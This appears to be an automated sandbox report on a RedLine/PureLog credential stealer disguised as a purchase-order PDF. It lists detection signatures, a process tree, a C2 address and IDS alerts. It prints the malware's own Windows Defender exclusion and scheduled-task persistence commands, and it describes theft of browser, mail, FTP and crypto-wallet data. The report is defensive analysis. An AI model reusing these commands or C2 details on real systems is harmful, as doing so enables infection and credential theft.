Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe

Overview

General Information

Sample name:PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
Analysis ID:1530636
MD5:2940b15a52c0aaa97db24e4043ffffcf
SHA1:fa29bd64c6fd9ca4811db98aa8608691cb0324c3
SHA256:6cb077ac45cc280c1ace4f4b7f7ec0feb23487074ac50e0113ade7e9509dbb85
Tags:exeuser-lowmal3
Infos:

Detection

PureLog Stealer, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to detect sleep reduction / modifications
Creates files in the system32 config directory
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to many different domains
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe" MD5: 2940B15A52C0AAA97DB24E4043FFFFCF)
    • svchost.exe (PID: 1088 cmdline: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
    • PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe (PID: 1436 cmdline: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe" MD5: 2940B15A52C0AAA97DB24E4043FFFFCF)
      • svchost.exe (PID: 6044 cmdline: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • microsofts.exe (PID: 576 cmdline: "C:\Users\user\AppData\Local\Temp\microsofts.exe" MD5: 1B1EC94BDE0A57A4A82BD2F20B2CB7F3)
        • Native_Redline_BTC.exe (PID: 6180 cmdline: "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe" MD5: 8C8785AC6585CF5C794B74330B3DB88F)
          • build.exe (PID: 7064 cmdline: "C:\Users\user\AppData\Local\Temp\build.exe" MD5: 3B6501FEEF6196F24163313A9F27DBFD)
          • server_BTC.exe (PID: 1272 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
            • powershell.exe (PID: 5880 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WmiPrvSE.exe (PID: 7544 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • schtasks.exe (PID: 6204 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
              • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • TrojanAIbot.exe (PID: 7252 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
            • cmd.exe (PID: 7292 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD5D5.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • timeout.exe (PID: 7348 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • alg.exe (PID: 7120 cmdline: C:\Windows\System32\alg.exe MD5: 882AAAB29114AA61C89B0726B6FA58A4)
  • TrojanAIbot.exe (PID: 7396 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 7472 cmdline: C:\Windows\system32\AppVClient.exe MD5: 5308671F56D4A4A4CDF6FF841AEF1780)
  • FXSSVC.exe (PID: 7780 cmdline: C:\Windows\system32\fxssvc.exe MD5: 283D4068FC62E71EA43B248224FAE579)
  • elevation_service.exe (PID: 8052 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: AC37DAB395406B7A2E223F34625726DE)
  • maintenanceservice.exe (PID: 8108 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: F20BF005553AB1557724E26FBFDB22C5)
  • msdtc.exe (PID: 8144 cmdline: C:\Windows\System32\msdtc.exe MD5: 46966EB01AA74C66C8C45009CAFCA510)
  • TrojanAIbot.exe (PID: 7192 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • PerceptionSimulationService.exe (PID: 7308 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 367BAC61864EA78BE8F89AAEA741C1B2)
  • perfhost.exe (PID: 2300 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: AFAD48DC29F1CF4A38DCFFCDB37F8BA9)
  • Locator.exe (PID: 7232 cmdline: C:\Windows\system32\locator.exe MD5: 3A5699061E1911C756244F5DD3EFCD56)
  • SensorDataService.exe (PID: 5428 cmdline: C:\Windows\System32\SensorDataService.exe MD5: A30B8B3725152FFD1FEF45C52D3261B8)
  • snmptrap.exe (PID: 4476 cmdline: C:\Windows\System32\snmptrap.exe MD5: 7D3200FA5E7F0DAE65D4ECB41018A0E8)
  • Spectrum.exe (PID: 2172 cmdline: C:\Windows\system32\spectrum.exe MD5: 2DDE61D6384346F05BA3DA4D78A1740A)
  • ssh-agent.exe (PID: 7756 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 03402E65F6A814316E26E0D2EB369ABC)
  • TieringEngineService.exe (PID: 7868 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: 10F8624709D07DA72863BBB00DFD5D16)
  • AgentService.exe (PID: 7660 cmdline: C:\Windows\system32\AgentService.exe MD5: FB45B515238278E8D72072D18DD7382C)
  • vds.exe (PID: 7928 cmdline: C:\Windows\System32\vds.exe MD5: 2EE227E57FDD41A436C3DE33802B4D02)
  • wbengine.exe (PID: 7344 cmdline: "C:\Windows\system32\wbengine.exe" MD5: 21B54458FED133A5634A8ABCCB5B5220)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["212.162.149.53:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\build.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Users\user\AppData\Local\Temp\microsofts.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 33 88 44 24 2B 88 44 24 2F B0 50 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000006.00000000.2117556197.0000000000012000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000006.00000002.2132146464.00000000123E2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000005.00000003.2424106953.0000000007240000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000005.00000003.2119948725.00000000006E3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000007.00000002.2559158756.0000000003086000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 10 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    6.2.Native_Redline_BTC.exe.12354d08.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      5.0.microsofts.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                      • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                      • 0x700:$s3: 83 EC 38 53 B0 33 88 44 24 2B 88 44 24 2F B0 50 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                      • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                      • 0x1e9d0:$s5: delete[]
                      • 0x1de88:$s6: constructor or from DllMain.
                      6.2.Native_Redline_BTC.exe.123eb188.3.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        5.3.microsofts.exe.590000.1148.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          5.3.microsofts.exe.6e3718.17.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                            Click to see the 14 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1272, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5880, ProcessName: powershell.exe
                            Sigma detected: Execution of Suspicious File Type Extension
                            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1272, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5880, ProcessName: powershell.exe
                            Sigma detected: Startup Folder File Write
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 1272, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                            Sigma detected: Suspicious Add Scheduled Task Parent
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1272, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f, ProcessId: 6204, ProcessName: schtasks.exe
                            Sigma detected: Suspicious Outbound SMTP Connections
                            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\microsofts.exe, Initiated: true, ProcessId: 576, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49712
                            Sigma detected: Suspicious Schtasks From Env Var Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1272, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f, ProcessId: 6204, ProcessName: schtasks.exe
                            Sigma detected: Uncommon Svchost Parent Process
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe", CommandLine: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe", ParentImage: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, ParentProcessId: 7140, ParentProcessName: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe", ProcessId: 1088, ProcessName: svchost.exe
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1272, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5880, ProcessName: powershell.exe
                            Sigma detected: Windows Processes Suspicious Parent Directory
                            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe", CommandLine: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe", ParentImage: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, ParentProcessId: 7140, ParentProcessName: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe", ProcessId: 1088, ProcessName: svchost.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-10T10:09:07.445163+020020516511A Network Trojan was detected192.168.2.5535671.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-10T10:07:29.544972+020020516491A Network Trojan was detected192.168.2.5639071.1.1.153UDP
                            2024-10-10T10:07:31.577907+020020516491A Network Trojan was detected192.168.2.5547451.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-10T10:07:28.326326+020020516481A Network Trojan was detected192.168.2.5632991.1.1.153UDP
                            2024-10-10T10:07:30.046321+020020516481A Network Trojan was detected192.168.2.5649431.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-10T10:07:28.296964+020020181411A Network Trojan was detected44.221.84.10580192.168.2.549711TCP
                            2024-10-10T10:07:29.068154+020020181411A Network Trojan was detected54.244.188.17780192.168.2.549713TCP
                            2024-10-10T10:07:33.148215+020020181411A Network Trojan was detected18.141.10.10780192.168.2.549724TCP
                            2024-10-10T10:08:06.325846+020020181411A Network Trojan was detected47.129.31.21280192.168.2.549929TCP
                            2024-10-10T10:08:07.906644+020020181411A Network Trojan was detected13.251.16.15080192.168.2.549942TCP
                            2024-10-10T10:08:13.663685+020020181411A Network Trojan was detected34.246.200.16080192.168.2.549985TCP
                            2024-10-10T10:08:14.476076+020020181411A Network Trojan was detected18.208.156.24880192.168.2.549992TCP
                            2024-10-10T10:08:22.918743+020020181411A Network Trojan was detected3.94.10.3480192.168.2.550017TCP
                            2024-10-10T10:08:28.103171+020020181411A Network Trojan was detected34.211.97.4580192.168.2.550022TCP
                            2024-10-10T10:08:46.579278+020020181411A Network Trojan was detected3.254.94.18580192.168.2.550040TCP
                            2024-10-10T10:08:55.636463+020020181411A Network Trojan was detected35.164.78.20080192.168.2.550057TCP
                            2024-10-10T10:09:05.122422+020020181411A Network Trojan was detected44.213.104.8680192.168.2.551583TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-10T10:07:28.296964+020020377711A Network Trojan was detected44.221.84.10580192.168.2.549711TCP
                            2024-10-10T10:07:29.068154+020020377711A Network Trojan was detected54.244.188.17780192.168.2.549713TCP
                            2024-10-10T10:07:33.148215+020020377711A Network Trojan was detected18.141.10.10780192.168.2.549724TCP
                            2024-10-10T10:08:06.325846+020020377711A Network Trojan was detected47.129.31.21280192.168.2.549929TCP
                            2024-10-10T10:08:07.906644+020020377711A Network Trojan was detected13.251.16.15080192.168.2.549942TCP
                            2024-10-10T10:08:13.663685+020020377711A Network Trojan was detected34.246.200.16080192.168.2.549985TCP
                            2024-10-10T10:08:14.476076+020020377711A Network Trojan was detected18.208.156.24880192.168.2.549992TCP
                            2024-10-10T10:08:22.918743+020020377711A Network Trojan was detected3.94.10.3480192.168.2.550017TCP
                            2024-10-10T10:08:28.103171+020020377711A Network Trojan was detected34.211.97.4580192.168.2.550022TCP
                            2024-10-10T10:08:46.579278+020020377711A Network Trojan was detected3.254.94.18580192.168.2.550040TCP
                            2024-10-10T10:08:55.636463+020020377711A Network Trojan was detected35.164.78.20080192.168.2.550057TCP
                            2024-10-10T10:09:05.122422+020020377711A Network Trojan was detected44.213.104.8680192.168.2.551583TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-10T10:07:28.978523+020020432341A Network Trojan was detected212.162.149.532049192.168.2.549706TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-10T10:07:27.497755+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:34.043970+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:34.589789+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:35.130041+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:35.981709+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:36.844179+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:37.969534+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:40.570303+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:42.974911+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:46.311317+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:46.636681+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:46.811614+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:47.045742+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:48.178596+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
                            2024-10-10T10:07:48.606672+020020432311A Network Trojan was detected192.168.2.549706212.162.149.532049TCP
